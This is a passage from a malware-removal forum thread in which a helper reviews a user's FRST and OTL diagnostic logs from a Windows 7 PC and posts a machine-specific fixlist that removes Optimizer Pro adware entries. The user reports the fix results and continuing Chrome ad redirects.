Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MixPad (HKLM-x32\...\MixPad) (Version: 3.46 - NCH Software)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MTA:SA v1.3.5 (HKLM-x32\...\MTA:SA 1.3) (Version: v1.3.5 - Multi Theft Auto)
OutfoxTV (HKLM-x32\...\OutfoxTV) (Version:  - OutfoxTV)
Outlook Setup Tool (HKLM-x32\...\outlookset) (Version: 2.2.19 - Starfield Technologies)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PhotoPad Image Editor (HKLM-x32\...\PhotoPad) (Version: 2.37 - NCH Software)
Pixillion Image Converter (HKLM-x32\...\Pixillion) (Version: 2.59 - NCH Software)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKCU\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 4.52 - NCH Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.55 - NCH Software)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinZip 18.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}) (Version: 18.5.11111 - WinZip Computing, S.L. )
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2275511576-419542734-2349628481-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Restore Points  =========================
 
01-10-2014 08:15:32 Windows Update
06-10-2014 23:52:56 Windows Update
12-10-2014 10:55:58 Windows Update
15-10-2014 13:16:55 Windows Update
16-10-2014 00:00:18 Windows Update
16-10-2014 03:17:51 zoek.exe restore point
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 13:34 - 2009-06-11 08:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {34AB405F-5E82-4260-8A90-D62022C97303} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {56BB85DD-9856-431F-BB8B-DF90EFFBC782} - System32\Tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292} => Chrome.exe 
Task: {92861FCA-C8BE-4844-97F1-D60C23CC1291} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {A1AB5C21-09B3-46F6-8BF3-B0507A0B83DE} - System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000 => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [2014-10-12] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {CF7962CC-8917-4EFA-8CFD-8DF92989274A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EB35C775-29EC-49F9-B105-E54F44A3CD74} - System32\Tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780} => Chrome.exe 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-08 16:35 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 04060488 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppGoogleNaClPluginChrome.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT2
AlternateDataStreams: C:\Users\Mitey Fresh\Downloads\RE Contract.eml:OECustomProperty
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DelaypluginInstall => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
MSCONFIG\startupreg: iSkysoft Helper Compact.exe => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
MSCONFIG\startupreg: Jing => C:\Program Files (x86)\TechSmith\Jing\Jing.exe
MSCONFIG\startupreg: LifeCam => "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Spotify => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: VX1000 => C:\Windows\vVX1000.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2275511576-419542734-2349628481-500 - Administrator - Disabled)
Guest (S-1-5-21-2275511576-419542734-2349628481-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2275511576-419542734-2349628481-1014 - Limited - Enabled)
Mitey Fresh (S-1-5-21-2275511576-419542734-2349628481-1000 - Administrator - Enabled) => C:\Users\Mitey Fresh
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
 
Microsoft Office Sessions:
=========================
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU P6100 @ 2.00GHz
Percentage of memory in use: 42%
Total physical RAM: 3886.04 MB
Available physical RAM: 2253.66 MB
Total Pagefile: 7770.26 MB
Available Pagefile: 5884.64 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.39 GB) (Free:116.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Data) (Fixed) (Total:180.27 GB) (Free:117.47 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: DA22E49B)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

  • 0

#9
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hello,

 

I have a few questions for you. Are you located in the US or Australia? The reason I ask is that I see programs that unfamiliar to US residents, but are common to Australia. I will look at them extra closely if you tell me that you live in the US and have no affiliation to Australia.

 

Next, before you run the fix, please open Chrome and then assure that you've closed all the Chrome windows. Finally, close Chrome and then reboot the computer and then run the following fix.

 

FRST.gif Fix with Farbar Recovery Scan Tool
 

icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

Press the WindowsKey.png + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:
    start
    
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    
    Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
    
    Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
    
    C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:
    
    end
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!


  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please post it when you reply.

 

 

Next, if the computer didn't reboot after the FRST fix, then please Reboot it.

 

After the reboot, see if Chrome is working correctly.

 

In either case, please run OTL using these instructions.

 

51a5d669693dd-icon_OTL.png Scan with OTL

Please download OTL by OldTimer and save the file to your desktop.
 

  • Right-click on 51a5d669693dd-icon_OTL.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Make sure that Scan All Users, LOP check and Purity check are ticked.
  • For 64-bit systems only - make sure that Include 64-bit option is also ticked.
  • Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
  • Section Extra Registry is also set to Use Safelist.
  • Push Run Scan and wait patiently.
  • Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.

 

 

To summarize, you should be posting the FRST fix log, the status of Chrome, OTL.txt log and Extras.txt log


  • 0

#10
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

Hi there,

 

Thanks for your reply.

 

Sorry I should have mentioned, I am located in Australia.

 

FRST Fix Log:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by Mitey Fresh at 2014-10-22 14:05:03 Run:2
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
 
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
 
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
 
C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:
 
end
*****************
 
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB369F07-98C3-4487-BD8B-FDD287D8CEAE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB369F07-98C3-4487-BD8B-FDD287D8CEAE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Optimizer Pro Schedule => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimizer Pro Schedule" => Key deleted successfully.
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION => Error: No automatic fix found for this entry.
"C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:" => File/Directory not found.
 
==== End of Fixlog ====

Chrome Status:

Same as before. Still opens but when clicking links I am still sometimes redirected to advertising.
Also I should mention this - when I click links in emails in Outlook, Chrome opens to my homepage but 4 other tabs also open with "Oops cannot be found". This has nothing to do with the previous problem but I would like to know how to fix this issue as well.

OTL.txt Log:

OTL logfile created on: 22/10/2014 2:12:31 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 2.40 Gb Available Physical Memory | 63.28% Memory free
7.59 Gb Paging File | 6.05 Gb Available in Paging File | 79.78% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 115.52 Gb Free Space | 42.25% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.16% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/10/18 16:52:14 | 003,835,728 | ---- | M] (LogMeIn Inc.) -- D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2014/10/10 12:58:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans\OTL.exe
PRC - [2014/10/03 21:30:08 | 001,514,040 | ---- | M] (Spotify Ltd) -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
PRC - [2014/02/20 12:03:06 | 000,859,464 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/20 12:03:05 | 000,394,568 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppgooglenaclpluginchrome.dll
MOD - [2014/02/20 12:03:03 | 004,060,488 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
MOD - [2014/02/20 12:02:59 | 000,716,616 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
MOD - [2014/02/20 12:02:58 | 000,100,168 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
MOD - [2014/02/20 12:02:56 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
MOD - [2014/02/20 12:02:54 | 000,051,016 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/09/19 12:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 16:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 16:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/05/27 16:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/05/20 16:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV - [2014/10/18 16:52:14 | 002,529,616 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- D:\Games\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014/09/24 20:48:07 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/30 04:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/04/19 13:26:23 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/21 09:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/10/23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/07/17 19:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/01/23 09:57:12 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/03/01 17:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/01/10 22:28:18 | 012,311,904 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 17:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 17:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 00:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:07:05 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/05/20 16:26:28 | 002,060,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VX1000.sys -- (VX1000)
DRV:64bit: - [2009/09/17 19:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/14 12:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 12:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 12:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/20 13:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/11 07:35:42 | 000,187,392 | ---- | M] (Realtek Corporation                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/06/11 07:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/11 07:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/11 07:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
